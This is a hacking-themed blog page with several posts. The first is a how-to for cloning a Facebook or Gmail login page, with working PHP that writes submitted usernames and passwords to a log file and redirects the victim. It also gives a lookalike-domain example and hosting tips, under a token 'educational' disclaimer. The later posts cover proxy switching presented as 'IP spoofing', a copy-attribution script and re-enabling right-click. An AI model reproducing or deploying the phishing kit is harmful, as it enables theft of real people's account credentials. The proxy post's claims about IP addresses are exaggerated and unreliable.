Showing posts with label Internet. Show all posts
Showing posts with label Internet. Show all posts

Nov 27, 2013

How to Create Phishing or Fake page of Facebook,Gmail and Etc...

Creating a fake ( Phishing ) page of gmail,facebook ,yahoo, myspace etc.



DISCLAIMER
I am not responsible for any damage caused by the user.This tutorial is purely for educational purposes.Please do not misuse this tutorial.
.

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.
For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.
So now u have a hosting account so lets create a fake page-
First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name "login.htm" .
or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".
Now the second part of the hack-
Go to Notepad and copy this into it-

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Replace facebook.com with the URL you want the user to go after he click on submit button.
Save the page as fish.php
Now you need to edit the "login.htm" file we save earlier. So go to that and open it with notepad.
now search for any htm like "action=" which has something with login. And replace the URL with "fish.php".
Also create a blank txt file with name "log.txt". This file would be used to save your logins and passwords.
Now you are done,
Go to your hosting account and upload all the files to your server.
Now go to the URL provided by your host.
Like - http://g00glepage.t35.com/login.htm
And you would see the fake page as it is.
Now enter the username and password.
Check the log.txt file. The password and username you entered previously would be saved in the log.txt file.
Here you have a working phishing page


Note:- For this trick require website on which you have to put three file fish.php,login.html,log.txt (where your password will be store).

Jan 24, 2013

IP Address Spoofing : Hide Your Self On Net

IP Address Spoofing : Hide Your Self On Net



Are you safe on the Internet? Do you feel as all your personal information is secured behind a firewall on your computer? Well, thing is that you are not. As soon as someone has your true IP address they can find out just about everything about you. Even down to the exact street your at right when you’re surfing the web. Hackers can use your IP address to create havoc for you not only on your computer but on the net as well. How you might ask? Well, they clone your IP address perpetrating themselves as you when they do something they shouldn’t be doing. It’s a certain degree of the term “Spoof”.

"By spoofing your IP address You can Hide your true identity for sites like Facebook, Google ( i.e A person in India can Make Facebook Believe that he came from U.S.A"

There are ways to be safe on the Internet though. There are ways to hide your IP address for any hacker or website. If you know just a little about the Internet you can utilize this really great website that “Spoofs” another IP addres thus hiding your real one. Usually a hacker updates their IP address several times an hour just to make sure any trace they might leave behind is as hard as possible to track.


Steps :
1. First find your real Ip address and location by going to http://whatismyipaddress.com/

2. Then Download and install Elite Proxy Switcher  Free version (http://www.eliteproxyswitcher.com/)


3. Now we will find some proxy addresses .
*Choose the required country.
*In Ports option type “ 8080 “ .
*Let the other options be as it is
*Click update results


4. Then we will get the list of proxy available .


5. Select any one of the ip address and copy it.


6. Then open  Elite Proxy Switcher , Select “ add” under “ Edit “ menu .


7. Paste the proxy address in “ IP “ box and “ 8080 “ in Port . Click OK.


8. Now right click the Proxy in the list of Elite Proxy Switcher and then choose “ Set as current active proxy “.


9.  Now goto http://whatismyipaddress.com/ and check your ip again.  If all had gone right it must be changed.



10 . To revert back choose “ use direct connection “ under “ Switch “ menu in Elite Proxy Switcher.
THAT’S ALL
“ NOW YOU KNOW THE ART OF IP SPOOFING “

How to Add a Copyright Link to Your Blog When Someone Copies Text From Your Blog

Well in my previous Post I've Showed you How to add a Read More Link whenever Someone Copies your text And paste it on their blog Using Tynt. But here is another trick to Do that. and This tutorial is very easy.So that There is no need to Signup wth tynt.com and Everything You can do on your Own.So let's See Below How to add this attribution link.

Just Go to Your Blogger Dashboard < Design < Edit Html.
Now Go Check Expand Widget Template Option .
Now Search for </head> and paste the Below Code Before it





<script type='text/javascript'>
function addLink() {
    var body_element = document.getElementsByTagName('body')[0];
    var selection;
    selection = window.getSelection();
    var pagelink = "<br/><br/> Original Post from: <a href='"+document.location.href+"'>"+document.location.href+"</a><br/>Copyright TUW - All Rights Reserved"; // change this if you want
    var copytext = selection + pagelink;
    var newdiv = document.createElement('div');
    newdiv.style.position='absolute';
    newdiv.style.left='-99999px';
    body_element.appendChild(newdiv);
    newdiv.innerHTML = copytext;
    selection.selectAllChildren(newdiv);
    window.setTimeout(function() {
        body_element.removeChild(newdiv);
    },0);
}document.oncopy = addLink;
</script>
So Now You Can Change "Original Post From " and "Copyright Tuw..." According to your Wish.


That's it. Now You're Done Once You've Added this Code Whenever Someone Copies Your text Then a Link Will be Shown Like below ;


Original Post From : http://back-to-hacking.blogspot.in/abcdefghijkl.html
Copyright Tuw-All Rights Reserved.

Oct 17, 2012

how To Enable Right Click ON Website Which Have Disabled It.


We Have Seen Many Sites In Which We Are Not Able To Use The Right Click Feature . This Is Due To The Site Owner Have Disabled It But We Can Enable It By Using Some Few Setting In Your Browser .


                                    



Most websites use javascript to prohibit the use of the right-click , so to enable it you should disable the javascript. TO Disable it do the following steps :




There Are Many Ways To Do It , The Simplest By My Opinion Is Using Web Developer 1.1.9 , Firefox Add-On .
1) Downlaod Web Developer 1.1.9 From This Link
2) Click Disable Button

3) Select Disable Javascript



4) Again select “All Javascript” option.